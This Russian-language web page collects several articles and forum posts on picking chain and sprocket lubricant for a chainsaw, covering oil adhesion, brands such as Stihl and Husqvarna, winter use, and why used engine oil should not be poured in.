31 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Какое масло заливать в редуктор бензопилы

Масло для цепи бензопилы — какое использовать

Вы являетесь владельцем бензопилы совсем недавно, и еще не знаете какое масло для смазки цепи бензопилы лучше использовать. Отсутствие этих знаний, может пагубно сказаться на инструменте, т. к. от вида и качества смазки зависит то, насколько долго шина и цепь инструмента будут сохранять свою работоспособность.

После прочтения этой статьи вы восполните пробел в знаниях, т.к. мы рассмотрим вопрос применения масел, различных производителей и марок, для снижения трения между деталями пильной гарнитуры. А также разберемся, какие дополнительные смазки применяются для обслуживания бензопилы, чтобы максимально продлить сроки ее эксплуатации.

Какое масло использовать для смазки цепи бензопилы

Ответить на этот вопрос достаточно просто, для этого необходимо открыть инструкцию к любой пиле и в ней будет указано, что заливать необходимо масло, имеющее хороший адгезионный эффект.

Адгезия – это показатель сцепления материала, в данном случае масла с металлической поверхностью шины и цепи.

Для чего это необходимо? Дело в том, что цепь по шине движется с высокой скоростью, и если в качестве смазки используется масло, которое обладают низкой адгезией, то большая его часть, по инерции, слетает с конца шины и смазка её нижней части не происходит. Это явление можно понаблюдать, если провести небольшой эксперимент. Завести бензопилу, направить конец шины в сторону какой-либо светлой поверхности и максимально добавить газ. В результате на ней будут появляться масляные пятна, которые и являются доказательством теории.

Смазка для звездочки бензопилы

Для увеличения срока службы и снижения трения на ведущей звездочки, производитель оснащает этот механизм игольчатым подшипником, который периодически необходимо смазывать. Для смазки можно применять многоцелевую смазку Stihl.

Если вы не хотите переплачивать, лучше использовать недорогой, но не менее качественный вариант, смазку Литол или Литол 24. Благодаря своей вязкости, Литол без проблем заменит оригинальную.

Смазывать звездочку шины бензопилы, можно теми же смазками, что и ведущую, применяя для этого специальную шприцовку. Это позволяет запрессовывать смазку, через технологические отверстия в шине, к подшипнику звездочки.

Производители адгезионных масел

Практически все производители бензопил, занимаются производством и расходных материалов для них, объясняя это тем, что эта продукция максимально подходит для применения совместно с их пилами. Насколько это верно информации нет, но исходя из опыта эксплуатации и ремонта бензопил, можно отметить, что существенных различий в сроке службы деталей или хотя бы видимом износе, не наблюдается.

Но факт есть факт, производители рекомендуют и скрыть это нельзя. Итак, вернемся к производителям, и начнем с популярного бренда Штиль.

Адгезионные масла Stihl

На сайте компании представлены следующие адгезионные масла, предназначенные для различных температур эксплуатации и имеющие хороший смазочный показатель:

  • Адгезионное масло ForestPlus – рекомендовано к эксплуатации при температуре до — 15 °C, срок годности при соблюдении условий хранения 3 года. Поставляется в литровой или пятилитровой таре;
  • BioPlus – её особенность — растительная основа, что позволяет ей быстро разлагаться при попадании в почву. Применяется до минус 15, поставляется в трех, пяти и однолитровой таре;
  • Последнее масло SynthPlus отличается способностью сохранять рабочие характеристики при температуре минус 25 °C.

Масла фирмы HUSQVARNA

Компания предлагает своим покупателям масло Husqvarna Bio Advanced для эксплуатации в обычных и экстремальных условиях. Масло производится из растительных компонентов и безопасно для окружающей среды, поставляется в литровой и пятилитровой таре.

В качестве экономичного решения в компании имеется масло Vegoil, по информации производителя, её расход по сравнению с другими уменьшен на 40%. Поставляется в литровой таре.

Компания также производит смазку для подшипников, которую рекомендует для смазки подшипников ведущей звездочки и звездочки на шине пилы.

Менее распространенные, но пользующиеся популярностью у владельцев бензопил, это:

  • Polar Lube минеральное – копании Oleo-Mac;
  • Адгезионная CHAMPION, продается в таре до 10 литров, что удобно для применения в лесном хозяйстве;
  • Makita Biotop;
  • Энкор.

Ознакомится с некоторыми маслами для цепей можно посмотрев видео ниже, в нем продавец крупной сети инструментов, комментирует вопрос применения адгезионных масел различных производителей.

Чем заменить оригинальное дорогое масло и стоит ли

В ситуациях, когда нет возможности использовать оригинальные, заменить их можно маслом для двигателей автомобиля. Дешевые автомобильные масла типа автол или дизельные варианты смазки, ввиду пониженных адгезионных свойств, непригодны для длительного использования.

Некоторые владельцы, несмотря на рекомендации все же применяют аналоги, предпочитая чаше менять шину и цепь, но тут уже каждый решает сам. Оказать какие-то негативные воздействия на систему смазки такое масло не может, а значит различие только в качестве защиты шины от трения цепи.

Немного про смазку цепи бензопилы отработкой

Отработкой называют масло, отслужившее свой срок в двигателе или коробке передач автомобиля. Многие владельцы бензопил, пытаясь сэкономить, используют его для смазки цепи, что выливается в серьезные расходы на ремонт.

Причина этих поломок, наличие в отработке примесей металлической стружки, которая оседает в картере автомобиля, и в момент слива отработки из поддона сливается вместе с ней.

Попадая на шину, металлическая стружка действует на её поверхность как абразив. Проще говоря, вместо того чтобы защищать поверхность, отработка усиливает износ шины, ведущей звездочки и подшипника ведомой звездочки на шине. Отработка воздействует и на цепь бензопилы, в тех местах, где она сгибается и увеличивает риск разорвать цепной механизм.

Вывод: для смазки цепи бензопилы нужно использовать оригинальные смазочные материалы от производителей. Отработку из двигателя автомобиля применять недопустимо. При отсутствии качественных масел, допускается кратковременная замена его на чистые автомобильные

Масло для цепи бензопилы: какое, куда и когда использовать?

Пильная гарнитура бензопилы работает в сложных условиях, которые отрицательно сказываются на ее долговечности. Подаваемое в рабочую зону масло для цепи бензопилы предотвращает перегрев рабочих деталей, способствует производительной распиловке твердой древесины. Плавный ход цепи снимает с силового агрегата часть нагрузки.

Конструкторы бензопильной техники признают необходимость полноценной смазки гарнитуры, поэтому в компактных конструкциях современных бензопил находится место для расходного маслобака и маслонасоса, с фиксированной или регулируемой производительностью.

Преимущества масел повышенного ценового уровня

В состав фирменных цепных масел входят полезные антиокислительные, противокоррозионные, стабилизирующие компоненты и присадки, способствующие сохранению рабочих свойств масла и повышению износостойкости рабочего оборудования в сложных условиях эксплуатации.

Качество фирменных расходных материалов является эталонным. В большинстве своем это продукция ведущих производителей Штиль, Хускварна, Эхо, Дэу и ряда других. За последние несколько лет заметно улучшились качества китайских цепных масел, произведенных на госпредприятиях.

Владельцы бензопильной техники самостоятельно решают, какое масло использовать для смазки цепи бензопилы. В лучшем варианте, это адаптированный к особенностям климата региона расходный материал рекомендованный инструкцией по эксплуатации данной модели.

Проблемы универсальности

К оценкам эксплуатационных достоинств, так называемых универсальных масел, следует относиться критически. В реальности это не совсем удачный рекламный ход. На сегодняшний день ни от одного уважающего свою репутацию производителя, информация о начале производства 100%-но универсального масла не поступала.

Практикой доказано, что неправильный выбор цепной смазки на 7-10% повышает нагрузку на двигатель и настолько же сокращает рабочий ресурс пильного комплекта.

Эксплуатационные свойства

Фирменное или стандартное масло для смазки цепи бензопилы по плотности, вязкости, степени очистки от посторонних примесей и другим рабочим характеристикам отвечает требованиям специальных стандартов.

  • Органические и минеральные составы по рабочим свойствам существенно не отличается.
  • Опытные пользователи рекомендуют работать на органических расходниках, если интервалы между применением бензопилы не превышают нескольких дней.
  • Противокоррозионные и другие защитные свойства более дорогих масел минеральных, задействуются, если инструмент применяется для нечастных разовых работ.

Проверить масло на соответствие внешней температуре, а заодно систему смазки на работоспособность, несложно. Для этого необходимо несколько секунд подержать гарнитуру работающей на средних оборотах пилы над чистым листом бумаги.

По широте и насыщенности масляной полосы можно судить о пригодности состава для длительной работы при данной температуре воздуха и производительности встроенного маслонасоса.

Критерии самостоятельного выбора

Проблема, чем заменить фирменное цепное масло, которое отсутствует в продаже, актуальна для многих периферийных регионов. По мнению специалистов, полноценный аналог — идентичная по основным характеристикам продукция известных брендов Штиль и Хускварна. Моторные и цепные масла этих производителей во всех отношениях зарекомендовали себя с самой лучшей стороны.

С учетом возможностей предлагаемого ассортимента, потребитель может сделать выбор в пользу более дорогого цепного масла или его бюджетного аналога. Помимо фирменной продукции, в перечне представлены масла Энкор, Нанотек Стандарт и Нанотек Премиум, сохраняющие рабочие свойства при температурах до -30°С.

Версии масел на минеральной основе представлены марками Makita и Makita Орегон, идентичные смазочные характеристики у органических цепных масел Makita Biotop, Stihl Bio Plus, которые реализуются в расфасовке объемом от 1 до 25 литров.

Профессиональные пильщики в большинстве своем отдают предпочтение фирменным смазочным материалам одного бренда. Постоянное применение масла одной марки позволяет изучить его возможности и использовать их с максимальной эффективностью.

Подгонка плотности масла к внешним температурным факторам

Использование цепного масла при низкой температуре до -20°С отрицательно сказывается на производительности масляного насоса и долговечности его привода.

При отсутствии нужного материала проблема решается разбавлением загустевшего на холоде масла. В качестве растворителя лучше всего подходит обезвоженный керосин.

Такая добавка обеспечит полноценную смазку гарнитуры, но большие нагрузки при работе пилы на разбавленном масле рекомендуется существенно ограничить.

Ценовые особенности предлагаемых ассортиментов

Европейские цепные масла высокой ценовой группы рекомендованы для эксплуатации профессиональной бензопильной техники, работающей в сложных, а то и экстремальных условиях.

Стоимость расходных материалов в полном объеме компенсируется производительностью масштабных распиловочных работ, надежностью, практически полной выработкой пильным оборудованием назначенного срока службы.

Отечественные цепные масла в большинстве своем производятся из своего сырья импортных присадок и с применением современных технологий.

По качественным и эксплуатационным характеристикам российский ассортимент не уступает аналогичной продукции европейских брендов, но стоит значительно дешевле.

Китайские пильные гарнитуры среднего класса по износостойкости и долговечности эксплуатации уступают европейским аналогам. Этот дисбаланс частично устраняется применением рекомендованных производителем цепных масел, разработанных китайскими специалистами.

По заверению поставщиков расходных комплектующих, наличие в китайских цепных маслах специальных присадок положительно сказывается на рабочих характеристиках штатных шин и пильных цепей, а также бензопильного оборудования в целом.

Все выше сказанное относится только к продукции крупных компаний. Преимущества использования цепных масел мелких частных предприятий на практике не доказаны.

Опасность применения масляного фальсификата

Рабочие свойства более дешевых поддельных масел по основным параметрам уступают фирменным разработкам. Проблема заключается в том, что рассчитывая на предполагаемое качество продукта, пользователи эксплуатируют свою бензопильную технику с полными нагрузками.

Применение суррогатных масел инициирует ускоренный износ материальной части, в ряде случаев является основанием для аннулирования сервисными службами заводских гарантийных обязательств.

Для того чтобы исключить риски приобретения фальсифицированного товара, расходные материалы лучше всего покупать в фирменных и лицензированных торговых предприятиях.

Последствия неоправданной экономии

Многих владельцев бюджетных бензопил оснащенных простыми системами смазки с постоянной производительностью беспокоит повышенный расход масла. Средняя цена качественного продукта в три раза меньше стоимости его моторного аналога, тем не менее, не редки случаи применения различных масляных суррогатов.

Используемое в разных пропорциях веретенное, дизельное и моторное масло автомобильное по своим рабочим свойствам для полноценной смазки гарнитуры не пригодны.

Реально подсчитать, сколько можно сэкономить на применении суррогата — не сложно. К сожалению, полученная прибыль не может компенсировать ускоренного износа старой и расходов на приобретение новой гарнитуры.

Постоянное применение заменителей сокращает срок службы дорогостоящей пильной гарнитуры на 30-40%. Износ существенно форсируется если заливать в систему смазки бензопилы, выработавшую свой ресурс отработку.

Для полноценной смазки и охлаждения цепи или заливки в редуктор не подходит ни один из предложенных пользователями составов. Не самый лучший вариант замены — зимнее моторное масло М8, которым в условиях общего дефицита заправлялись бензопилы Дружба и их прототипы.

Достоинства автоматических систем

Менее затратные по расходу масла бензопилы, оснащенные системами автоматической смазки. В зависимости от оборотов двигателя, подача масла дозируется насосом с регулируемой производительностью.

На оборотах холостого хода масло практически не расходуется. В моделях с автоматической смазкой расход рабочего материала снижается практически наполовину.

Рекомендации профи по выбору и применению цепных масел

Расходные материалы желательно покупать только в фирменных магазинах или представительствах лицензированных дилерских компаний.

  • От покупки масла с заметным осадком, явно выраженным фракционным расслоением, несмотря на меньшую стоимость лучше отказаться.
  • Следует удостовериться в наличии информации, содержащей данные о местонахождении предприятия, каналах электронной и телефонной связи, четко обозначенных сроках хранения эксплуатационных ограничениях и особенностях применения.
  • Перед покупкой товара малоизвестной торговой марки полезно просмотреть в интернете потребительские отзывы.
  • Категорически нежелательно смешивать минеральные и органические масла. Залитую в маслобак однотипную смесь масел от разных производителей после окончания необходимо слить, длительному хранению такие композиты не подлежат.

Работу системы смазки необходимо периодически контролировать. Отсутствие подачи масла легко определить по увеличению нагрузки на двигатель и запаху перегретой древесины. В дополнительной смазке нуждается венец и подшипник ведущей и ведомой звездочек.

Особенности хранения

Новые и уже поработавшие пильные цепи для длительного хранения в неотапливаемых помещениях рекомендуется укладывать в масляные ванны. Такой способ выгодно отличается от нанесения консистентной смазки, поскольку исключает образование конденсатной влаги и местной коррозии.

Правила выбора масла для цепи бензопилы

Во всех современных бензопилах предусмотрен отдельный масляный контур для смазывания режущих элементов цепи.

Качество работы пилы во многом зависит от их состояния и условий работы. Поэтому фирмы, выпускающие аксессуары для бензопил, создают специальные марки масел, обеспечивающие надежное смазывание поверхности.

Какое масло нужно использовать

Широко распространено мнение, что качественное фирменное масло для цепи бензопилы надо применять только в бензиново-масляной смеси двигателя. Тем не менее выбор масла для смазки – дело нехитрое. Подойдет любое, лишь бы попадало куда надо.

Но подать смазку на цепь – полдела. Надо чтобы она удержалась на металле и осталась на нижней кромке, которой и пилят дерево. Для этой цели применяют вещества с повышенной адгезией, то есть способностью прилипать к поверхности и удерживаться на ней. Масло со слабой адгезией будет слетать с быстро вращающейся цепи, без толку забрызгивая все вокруг. Конечно, какая-то часть останется, но неизвестно, будет ли этого достаточно, чтобы при интенсивной работе цепь не перегревалась.

Важно! При всесезонной работе бензопилой нужно учитывать зависимость условий подачи масла от времени года и температуры воздуха.

Минеральные материалы, обеспечивающие смазку цепи и шины при плюсовой температуре, на морозе кристаллизуются и густеют. Это приводит к тому, что смазка будет подаваться с трудом и возрастет нагрузка на масляный насос. Срок его службы сокращается, и он может преждевременно выйти из строя. Зимой надо выбирать синтетические материалы со специальными добавками, обеспечивающими надежную смазку при морозах до -40 ℃. При небольших морозах и температурах около нуля используют полусинтетику.

Оценки применения разного масла для смазки цепей бензопил сводятся к тому, что неверный выбор способен увеличивать нагрузку на двигатель до 10%. Еще больше сокращается срок службы самой цепи и пильной шины.

В связи с тем, что в последнее время придается большое значение экологии, все чаще фирменные маслопродукты изготавливаются на основе разлагающихся веществ. А ведь при длительной работе расход цепной смазки может измеряться литрами. И для неравнодушных к природе людей это будет лишним поводом выбрать экологически безопасный продукт. Если не все равно, чем забрызгивается свой участок и какие следы остаются на древесине после распила.

Когда и как заливать

Куда заливать масло для цепи – понятно. Для этого есть отдельная емкость. В большинстве бензопил размер этой емкости рассчитывается с учетом объема бензобака пилы. При заполнении обоих бачков под завязку они пустеют примерно в одно и то же время. Поэтому рекомендуется заливать полный объем масляного бачка одновременно с заполнением топливного бака. Тогда не придется отвлекаться на долив дважды.

Перед началом работы полезно проверить, будет ли поступать масло на цепь. Для этого достаточно направить конец шины на ровную поверхность. Какая-то часть смазки слетит с края шины. Попадание капель на поверхность свидетельствует о нормальной работе системы.

При больших отрицательных температурах летнее масло густеет и его смазывающая способность ухудшается. Поэтому стоит применять марки, предназначенные для зимних условий. Если такой возможности нет, то стоит потратить время на разбавление имеющегося масла для уменьшения его густоты. Разбавлять лучше всего керосином в соотношении 1 к 4.

В некоторых моделях предусмотрена регулировка скорости подачи в смазочной системе. Она полезна для корректировки в случае смены типа смазки.

Обратите внимание! Нельзя заливать в бак смесь масел разных видов – минеральные и синтетические.

Если закончилось масло от одного производителя, а в наличии есть тот же тип, но другой фирмы, то допускается их смешение при условии немедленного использования. Оставлять подобную смесь надолго не стоит.

Смазка для звездочки

На конце шины для бензопилы находится ведомая звездочка, обеспечивающая вращение цепи. Ее тоже периодически нужно смазывать. Для этого применяются густые материалы. Можно использовать универсальную смазку STIHL. Годятся и отечественные смазки на основе литола. На шине для смазывания звездочки есть специальное отверстие. В него пресс-масленкой или шприцом нужно закачать смазку.

Следует обратить внимание, что при частой работе носком шины, например, при выборке пазов, нагрузка на звездочку увеличивается и смазывать ее нужно чаще.

Основные производители

Ведущие производители бензопил выпускают расходные материалы и смазки для них, в том числе и специально для цепей и шин. При прочих равных обстоятельствах следует отдавать предпочтение продукции производителя самой бензопилы. Но качество лучших марок таково, что применение смазок другого производителя не окажет негативного воздействия на работу.

Самыми известными марками считаются немецкая фирма STIHL, шведская Husqvarna и японская Makita. Они предоставляют достаточно широкий выбор адгезионных масел, среди которых есть такие:

  • минеральное Stihl ForestPlus предназначено для работы при температуре до -15 ℃. Стандартная фасовка – 1 и 5 л. Для длительных работ с недавних пор выпускается и в 20-литровой таре;
  • высокоэкологичное Stihl BioPlus выпускается на растительной основе. Попав в почву, быстро разлагается, не загрязняя ее. Рабочая температура также до -15 ℃. Фасовка – 1 и 3 л;
  • для низких температур подходит полусинтетическое Stihl SynthPlus, работающее применимо до -25 °.
  • Экологичные, биоразлагаемые Bio и Bio Advanced. Представляется как универсальное всесезонное масло. Вариант Bio Advanced – улучшенная стойкость к окислению и до 10 % лучше смазочные свойства;
  • Маkita. Масло Biotop;
  • адгезионное масло Champion.

Из российских марок специально для цепей есть «ЗУБР ЗМПМ-М». Встречаются и другие, менее известные производители, смазочное масло которых заметно ниже по цене.

Чем заменять дорогое масло

У специальных фирменных смазок для цепей недостатком является их высокая цена. Купить литр другой дорогого масла необременительно. А если предстоят работы, требующие нескольких литров, а то и десятков литров, – наверняка возникнут мысли об экономии. Главное, при рассмотрении вариантов не удариться в крайность. Сэкономить на масле можно до такой степени, что придется несколько раз менять цепь, а то и саму шину или масляный насос.

Существует три варианта замены. Во-первых, можно применять для смазки цепи специализированную продукцию малоизвестных производителей. Но такие масла еще надо поискать. К тому же есть риск наткнуться на некачественный продукт.

Применение масел для автомобильных двигателей. Как временную замену их можно использовать, но высокой адгезией они похвастаться не могут, поэтому качество их работы будет явно хуже специальных. По этой причине не рекомендуется применять веретенное и дизельное масла – худшие по адгезии.

И обязательно надо сказать о еще одном варианте – отработке. Так называется масло, отработавшее свой срок в двигателе, и слитое из него при замене.

На самом деле, это совсем не вариант. В отработке обязательно присутствуют металлические частицы. И если самой цепи они, может быть, и не повредят, то уж масляному насосу и всей системе смазки – наверняка. На форумах в интернете можно встретить «убойный» аргумент в пользу отработки – что советская бензопила «Дружба» вообще не имела смазки цепи и работала. Так что можно лить что угодно – и так сойдет. Ну, так и «Штиль» тоже будет работать с отработкой или вообще с несмазываемой цепью. Вопрос в том, как долго он будет работать и сколько цепей придется за этот срок сменить.

Предостережение тем, у кого бензопила находится на гарантийном сроке. Мастера гарантийных мастерских умеют выявлять случаи применения некачественной смазки цепи. Особенно при использовании отработки. Отказ от ремонта по гарантии последует незамедлительно.

Масло не поступает на цепь, каковы причины

Не всегда во время работы можно сразу увидеть, что масло на цепь бензопилы не подается. Признаки отсутствия смазки:

  • уровень в бачке не понижается;
  • распил идет с трудом, сопровождаясь запахом горелого дерева;
  • с кончика шины бензопилы не слетают масляные капельки.

Обнаружив неисправность масляной системы, нужно установить ее причину. Таковых немного – засорение, обрыв шланга или неисправность масляного насоса.

Чаще всего засоряется грязью и опилками канал маслоподачи. Продувки воздухом или прочистки тонкой проволокой достаточно для устранения неисправности. В масляном бачке есть свой внутренний фильтр. При использовании нормального масла его засорение маловероятно, а при заливке отработке – вполне возможно. Придется прочищать.

Может оказаться поврежденным или совсем оборваться масляный шланг. Временно можно заклеить поврежденное место, но надежней будет заменить на новый.

И самая серьезная проблема – поломка масляного насоса. Причины могут быть разные – износились зубья червячной шестерни, произошло заклинивание плунжера и другие. Снять насос и заменить поврежденную деталь самостоятельно будет непросто. Надежней и проще обратиться в сервисный центр.

Какое масло лить в масляный отсек бензопилы?

В инструментах null.
Купил бензопилу Partner 350 для дачи, начал читать инструкцию, не понял про масло.
Т.е. масел должно быть два разных?
1) Одно мне продали в магазине, где и пилу брал, оно называется HP, смешивается с бензином. О нём так и говорится — «Масло двухтактное, предназначено для бензосмеси».
(что такое двухтактное?)
2) Другое какое-то надо залить в специальный отсек для смазывания цепи пилы во время работы. Т.к. цепь — это не бензосмесь, то я сделал вывод, что это не первое масло, а другое.
Что это и где купить и почём?

PS. Прошу не ржать надо мной, если вопрос совсем идиотский. Просто скажите сами или где прочитать, в инструкции так написано, что я не понял.

Кстати, а где скачать оригинальную инструкцию к этой бензопиле? В pdf, наверное.

2Botan » >

ИМХО, любое моторное масло Впрочем, см. ссылку Викторыча Даже сало!!

Ну просил же — перестаньте ржать!! Вам смешно, а мне в выходные работать, участок очищать. Я в жизни первый раз в руках бензопилу держу.
Просто дайте ссылки в инете на нужное масло.
Викторыч, ну что это за ссылка про сало и растительное масло? По этой ссылке тоже половина ржач, что вам здесь делать нечего? ОТветьте же по существу, оч. прошу!
Я правильно по маслам понял, они разные?
С этой пилой кто-нибудь работал? Конкретно что заливали-то?

ПО СУЩЕСТВУ: Зайдите в любой ларек с автомаслами и попросите ЛЮБОЕ МОТОРНОЕ МАСЛО. И все.
Я именно так и поступил пять-семь лет назад, не помню уж. Пока литровой бутылки на мои потребности хватило. Осталось граммов 100.

Botan написал :
Что это и где купить и почём?

на любой фирменной заправке тнк, сибнефть, татнефть и тд
покупешь самое дешевое (если зимой валить не будешь) моторное масло, 4л фляги
если мало пилить можно и 1л

2 Юберменш, 2 Do Home Yourself : благодарю вас.
Всё, понял. Покупаю любое моторное масло, 4 л.
А если не самое дешёвое, то какое? Или если будут неск. масел при примерно одинаковой цене — на что обратить внимание? Что вообще в этом масле самое главное? Вот в бензине — октановое число. А в масле что?

ИМХО, для ваших целей такими вопросами заморачиваться не стОит. Берите любое, допустим, с самой красивой этикеткой или в самом красивом флаконе.

Botan написал :
Что вообще в этом масле самое главное?

температурный диапазон
что б зимой наливать, а не ножиком на шину мазать

Юбер написал :
с самой красивой этикеткой или в самом красивом флаконе

отличный вариант, что б красиво на полочку встало

2Botan Я ж вам специально эту ссылку дал, чтобы было поннятно:
а. Практически по барабану что на шину лить, чел между прочим вполне серьезно про подсолнечное масло говорил, еще была ветка про отработку для этих же целей, лень искать. Мужики верно сказали — любое моторное (хотя некоторые предпочитают трансмиссионку). Есть специальное для этих целей, типа экологически чистое, быстро разлагающееся.
б. Вопросы бензопил обсуждаются в «Садовых делах», там шансов получить ответ намного больше.
ЗЫ Двухтактное — предназначено для двухтактных двигателей, как у вас, в отличие от четырехтактных (автомобили и тд)
ЗЗЫ А в инструкции разве не написано какое масло куда лить?

а) Про подсолнечное масло там [1] со смайликами и [2] никто не отписАлся по результатам. Я так понял, что вы здесь пошутили как профи и закрыли тему. Я сразу не врубаюсь, где здесь шутка, а где нет, для этого у меня опыта не хватает. В смысле его вообще нету. Поэтому и прошу писАть серьёзнее, не всем ваши приколы сходу понятны, а мне и не сходу непонятны.

б) В инструкции дословно вот что написано (стр. 15) :
«Для смазки шины и цепи используйте специальное масло для смазки шины и цепи».
Это не я придумал. Это они так сказали.

в) 2 Do Home Yourself.
Про температурный режим разумно. Вот вдруг зимой под весом снега дерево сломается, зимой надо будет пилить. А масло застынет. Нехорошо.

г) 2 Юберменш
Чего я баба что ли красивые этикетки искать? Фирму бы сказали что ли, производителя, всё по делу.

И чего это из вас всех правду клещами вытягивать надо, вы информацией делитесь как разведчики во вражеском тылу. Нет бы сразу сказать — надо то-то и то-то, по пунктам, раз, два, три. А то текста здесь читать пришлось много, а сути — 5%, типа КПД по объёму слов.

Масло для цепей бензопил. Какое масло использовать для смазки цепи бензопилы?

Бензопилы – популярный инструмент для тех, кому приходится заниматься многочисленными домашними делами самостоятельно. Их можно использовать для разных целей – заготавливать дрова, отрезать сухие ветки… Но чтобы устройство прослужило как можно дольше, нужно правильно ухаживать за ним, грамотно выбирая различные составы. Особенную роль играет масло для цепей бензопил, которое подбирается в зависимости от принципов работы инструмента и его характеристик.

Что учесть?

Смазке цепи пилы следует уделять должное внимание. В первую очередь следует выбрать специальное масло, которое не нанесет вреда масляному насосу. Кроме того, это обеспечит качественную работу системы самосмазки. Цепь требует и правильного хранения, то есть погружения в масло, а в случае износа не стоит пытаться реанимировать старую цепь – проще ее заменить. Какое выбрать масло для цепей бензопил, чтобы оно было безопасным и отвечало всем требованиям?

Виды и состав

Выбирать конкретное масло следует в зависимости от того, где и как эксплуатируется бензопила. Для лета и теплого времени года подходят минеральные составы. В остальных случаях лучше использовать синтетические или полусинтетические масла. При необходимости смазки цепи не стоит пользоваться отработанными маслами, которые приведут к засорению топливной системы, а затем и к серьезным поломкам инструмента.

Масло для цепей бензопил должно быть тщательно очищенным, чтобы смазка была выполнена грамотно и аккуратно. Если использовать некачественные составы, то контакта между элементами пилы и шиной не будет, появятся искры, а впоследствии износятся подвижные детали пилы.

Как выбрать?

Каждая бензопила имеет карбюраторный двухтактный двигатель и два бака: в один заливается бензин, во второй – масло. При выборе состава для смазки важную роль играет зональность – она должна быть минимальной. Еще один важный показатель – стойкость к воздействию низкой температуры: масло не должно застывать при сильном минусе, что обеспечит качество работы всего инструмента.

Для смазки целесообразно использовать адгезионное масло для цепей бензопил, содержащее специальные вещества, благодаря которым состав хорошо сцепляется с цепью. Качественное масло будет оставаться на цепи при ее вращении, а сама цепь будет более надежной в эксплуатации.

Еще один важный показатель смазки – густота: если состав жидкий, он будет расходоваться в большем количестве. Чтобы при использовании бензопилы не наносился вред окружающей среде, важно использовать масло на растительной основе – его отходы будут разлагаться в естественной природной среде.

Какое масло для цепи бензопилы выбрать, ведь современные производители предлагают широкий выбор вариантов? Из числа специализированных производителей можно отметить такие марки, как Divinol, Bio-Kettenol, Ravenol, VegOil, Mobil, Castrol, Shell. Рассмотрим особенности их продукции подробнее.

Divinol

Этот бренд предлагает оценить смазку для цепей высокого качества, которая отличается хорошими адгезионными и смазочными способностями, благодаря чему смазка выполняется качественно, а звенья и шарниры цепи надежно защищаются от износа. Оптимальное сочетание вязкости и температурных характеристик служит залогом того, что данное масло можно использовать в любой сезон и при любой температуре.

Divinol предлагает разное масло для цепи бензопилы. Какое использовать из них? Zweitaktoel FF привлекает внимание экономным расходованием, соединением с любым топливом, предотвращением старения топливной смеси и отличной защитой от коррозии. Кроме того, данное масло можно использовать при любом температурном режиме. Divinol Kettenol и Divinol Kettenol Bio можно использовать для смазки цепей и шин бензопилы. С помощью данных составов можно надежно защитить от износа звенья и шарниры цепи при гарантии экономного расходования масла. Высококачественные органические масла данной марки обеспечивают превосходное смазывание и клейкие свойства, поэтому их использование не только просто, но и экологически безопасно.

Ravenol

Какое масло для смазки цепи бензопилы выбрать? Многие отмечают составы марки Ravenol. Так, Ravenol Saegekettenoel S 85 является специальным минеральным маслом, созданным в Германии из базового масла высокого качества с добавлением целого ряда присадок. Оно подходит для смазки цепи пилы, отличается хорошим сцеплением и смазочными свойствами. Благодаря специальным присадкам масло остается на цепи даже при высоких оборотах пилы, а сама цепь становится более надежной в эксплуатации. Обеспечивает масло и надежную защиту от коррозии, даже если работы ведутся в не самых благоприятных условиях. Благодаря применению данного состава можно:

  • снизить вибрацию пильной цепи;
  • надежно защитить ее от коррозии;
  • охладить цепь благодаря хорошей теплопроводности;
  • быстро и чисто резать любые породы дерева.

Stihl BioPlus

Наверное, у каждого пользователя на слуху продукция марки Stihl. Экологичное масло для цепи бензопилы «Штиль» отличается эффективностью, а в его основе лежат растительные компоненты. Цепное масло обладает высоким качеством, которое можно оценить в любых климатических условиях. Благодаря экологичности продукция Stihl всегда была популярной у покупателей. Особенного внимания заслуживает масло для смазки цепи Stihl BioPlus, которое создано для обработки быстроходных цепей. Оно отличается:

  • стойкостью к замасливанию;
  • отличной адгезией благодаря специальным добавкам;
  • отличной защитой режущей гарнитуры;
  • отличной текучестью, которая сохраняется даже при низких температурах;
  • стойкостью к окислению.

Самое главное в том, что масло абсолютно безопасно для окружающей среды, так как оно разлагается естественным путем.

Полусинтетическое масло Stihl

Масло для цепи бензопилы Stihl отличается экологичной смазкой, так как произведено оно из первичных рафинатов высокого качества. В составе масла нет примесей, которые могут загрязнить окружающую среду. Использовать данное средство можно в любых климатических условиях, причем оно будет одинаково эффективно вести себя даже при низких температурах. Цепное масло Stihl служит надежной защитой пильных цепей от износа. Приобрести этот состав можно в разном объеме — это зависит от особенностей бензопилы и степени нагрузки на нее.

Husqvarna

Продукция этого бренда тоже не нуждается в лишних представлениях, так как она зарекомендовала себя только с лучшей стороны. Привлекает внимание масло для смазки цепей Vegeil Husqvarna, которое создается на растительной основе, отличается хорошими смазочными свойствами и высокой экологичностью. Масло экономичное, биологически разлагаемое, отличается низкой вязкостью даже при эксплуатации при низких температурах. Благодаря отличным эксплуатационным характеристикам масла данной марки считаются одними из самых лучших.

Oregon

Какое масло использовать для смазки цепи бензопилы и как выбрать такое, чтобы его можно было применять в любое время года? Марка Oregon предлагает составы, которые подходят для любых видов инструментов. Стабильность вязкости – залог того, что масло подходит для эксплуатации в любое время года. В состав входят очищенные минеральные масла, к которым добавляются присадки. Особенность составов Oregon – в изготовлении их на базе высокомолекулярных соединений. К отличительным особенностям масла относятся:

  • защита направляющей шины и цепи от перегрева;
  • снижение вибрации;
  • предотвращение появления коррозии за счет образования масляной пленки.

Благодаря специальным адгезионным присадкам такое масло обретает большую липкость, вязкость, поэтому даже при высоких оборотах оно не будет разбрызгиваться и останется на цепи и шине. Благодаря регулярному использованию масла можно снизить нагрузку на режущую гарнитуру, да и в целом на весь механизм бензопилы. Специальные присадки позволяют снизить потребление энергии пилы, увеличивая эффективность процесса пиления. Главное, что при использовании данных средств не образуются смолистые отложения.

Sage-Kettenoil

Данное масло имеет такой специфический состав, что полностью биологически разлагается, но остается при этом безопасным с точки зрения воздействия вредных веществ. Благодаря сочетанию растительных масел с качественными присадками цепь смазывается более качественно, она надежно защищается от износа при любых условиях эксплуатации. Из-за хорошей адгезионной и смазочной способности смазка осуществляется максимально удобно и оптимально, причем эксплуатировать состав можно при морозах до 30 градусов.

Какое масло заливать в редуктор бензопилы

quote: Originally posted by Igoreh@:
5 литров бензина за лето спалить, умудриться надо.
участок зачищали- 10 литров спалили за два дня. сейчас ещё и весь этот бурелом на куски резать надо. но в общем вы, конечно правы- если на смазывании цепи ещё можно сэкономить, то в двигатель лить лучше специальное двухтактное масло.

Да насколько мне известно на касторке не только Нестеров «летал». В детстве в картинги и мопэды заливали, в смеси с авиационным 66-м бензином. У папы и шишига «ГАЗ-66» кто не знает, на ентом бензине летал.

